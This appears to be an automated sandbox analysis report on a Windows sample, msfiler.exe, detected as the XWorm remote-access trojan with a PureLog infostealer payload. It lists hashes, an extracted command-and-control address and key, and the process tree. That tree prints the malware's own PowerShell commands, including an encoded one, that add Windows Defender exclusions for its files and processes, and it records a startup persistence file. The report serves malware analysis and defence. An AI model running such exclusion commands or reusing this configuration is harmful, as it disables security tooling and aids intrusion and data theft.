Analysis
-
max time kernel
150s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
16-05-2024 12:16
Static task
static1
Behavioral task
behavioral1
Sample
msfiler.exe
Resource
win7-20240220-en
General
-
Target
msfiler.exe
-
Size
419KB
-
MD5
8a716466aa6f2d425ec09770626e8e54
-
SHA1
62fb757ea5098651331f91c1664db9fe46b21879
-
SHA256
585d1fb4f288974b683c5abfb10c97d7d2ae3f59c2bcfd78ba272e3be2cd7815
-
SHA512
54f11067e400347834689b4532ae53b00ec96a3ca90a2c21de27942f4ca30306fdda0522c1a3a4cde047ad650162e2d8313205220acaab4cc60e010965690940
-
SSDEEP
6144:QTCsE3O4yuS5O0RBOInaCa6G6ypdf4Bf7e/DnjBeq04fVXOUvE0CGsSE9BLM:2E3O5uOO0mInnGZCTS84fZLtw
Malware Config
Extracted
xworm
5.0
5.182.87.154:7000
VMFidhoqn75fm5lJ
-
Install_directory
%Temp%
-
install_file
mdnsresp.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/4992-10-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
PureLog Stealer
PureLog Stealer is an infostealer written in C#.
-
PureLog Stealer payload 1 IoCs
resource yara_rule behavioral2/memory/220-5-0x00000000058E0000-0x0000000005928000-memory.dmp family_purelog_stealer -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 64 powershell.exe 4920 powershell.exe 1944 powershell.exe 4816 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation msfiler.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation msfiler.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mdnsresp.lnk msfiler.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mdnsresp.lnk msfiler.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 220 set thread context of 4992 220 msfiler.exe 86 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 3708 powershell.exe 3708 powershell.exe 4816 powershell.exe 4816 powershell.exe 64 powershell.exe 64 powershell.exe 4920 powershell.exe 4920 powershell.exe 1944 powershell.exe 1944 powershell.exe 4992 msfiler.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 220 msfiler.exe Token: SeDebugPrivilege 4992 msfiler.exe Token: SeDebugPrivilege 3708 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 64 powershell.exe Token: SeDebugPrivilege 4920 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4992 msfiler.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 220 wrote to memory of 3708 220 msfiler.exe 84 PID 220 wrote to memory of 3708 220 msfiler.exe 84 PID 220 wrote to memory of 3708 220 msfiler.exe 84 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 220 wrote to memory of 4992 220 msfiler.exe 86 PID 4992 wrote to memory of 4816 4992 msfiler.exe 91 PID 4992 wrote to memory of 4816 4992 msfiler.exe 91 PID 4992 wrote to memory of 4816 4992 msfiler.exe 91 PID 4992 wrote to memory of 64 4992 msfiler.exe 95 PID 4992 wrote to memory of 64 4992 msfiler.exe 95 PID 4992 wrote to memory of 64 4992 msfiler.exe 95 PID 4992 wrote to memory of 4920 4992 msfiler.exe 98 PID 4992 wrote to memory of 4920 4992 msfiler.exe 98 PID 4992 wrote to memory of 4920 4992 msfiler.exe 98 PID 4992 wrote to memory of 1944 4992 msfiler.exe 100 PID 4992 wrote to memory of 1944 4992 msfiler.exe 100 PID 4992 wrote to memory of 1944 4992 msfiler.exe 100
Processes
-
C:\Users\Admin\AppData\Local\Temp\msfiler.exe"C:\Users\Admin\AppData\Local\Temp\msfiler.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAbQBzAGYAaQBsAGUAcgAuAGUAeABlADsA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\msfiler.exeC:\Users\Admin\AppData\Local\Temp\msfiler.exe2⤵
- Checks computer location settings
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\msfiler.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msfiler.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:64
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\mdnsresp.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mdnsresp.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5db56d47655157e6f9c111379ba509a22
SHA1605c2bda416607c031748c55cef14c3fadf13029
SHA256c3d4b6e9a8094c1d08ee45de21c3b35b4e853e4c95c974e2b708e05c93cdba3f
SHA512c9e268ebc3cf54710530609892969722804ac5a3c3cc2d07dedbb15cadbb54f3e7a55b6c84c0292b6e44a6116320e242437903438be7733176f3508f127e9f49
-
Filesize
18KB
MD57166995ffaa9d58e9ca424c945f5fbef
SHA1ecb2fc17b5e45dc304b0f747dd74a893389ba7f2
SHA256e17181eae55eff53c8daf8fccacc5b14e57b03799665d2cc99a19ae3d45e418e
SHA512d8f1e6085406900fdae9a1b332421c34aed92c6af07719f39126137a63a7cbb2fb6ae6e0d819f38047e1940af8d7e7bcc168836f255d7f6f775534acc60cca0c
-
Filesize
18KB
MD52c62f850a33f1bb1827ad19ce52c47a6
SHA14bf0c718cd5c596cd0d8ab8e813a6ef6794c85b0
SHA256f19bd12dce60623bb09785a293658c645ced72845d246ae5c3696f0086c362c9
SHA51204fc3ec90a20b91b9a376e03cf848a129c04c552b14b288bdfe609ad3de7350c26619fb4ada14be422dd723b050ed4165090dd8cf0247a3a8442c9916a4a4952
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82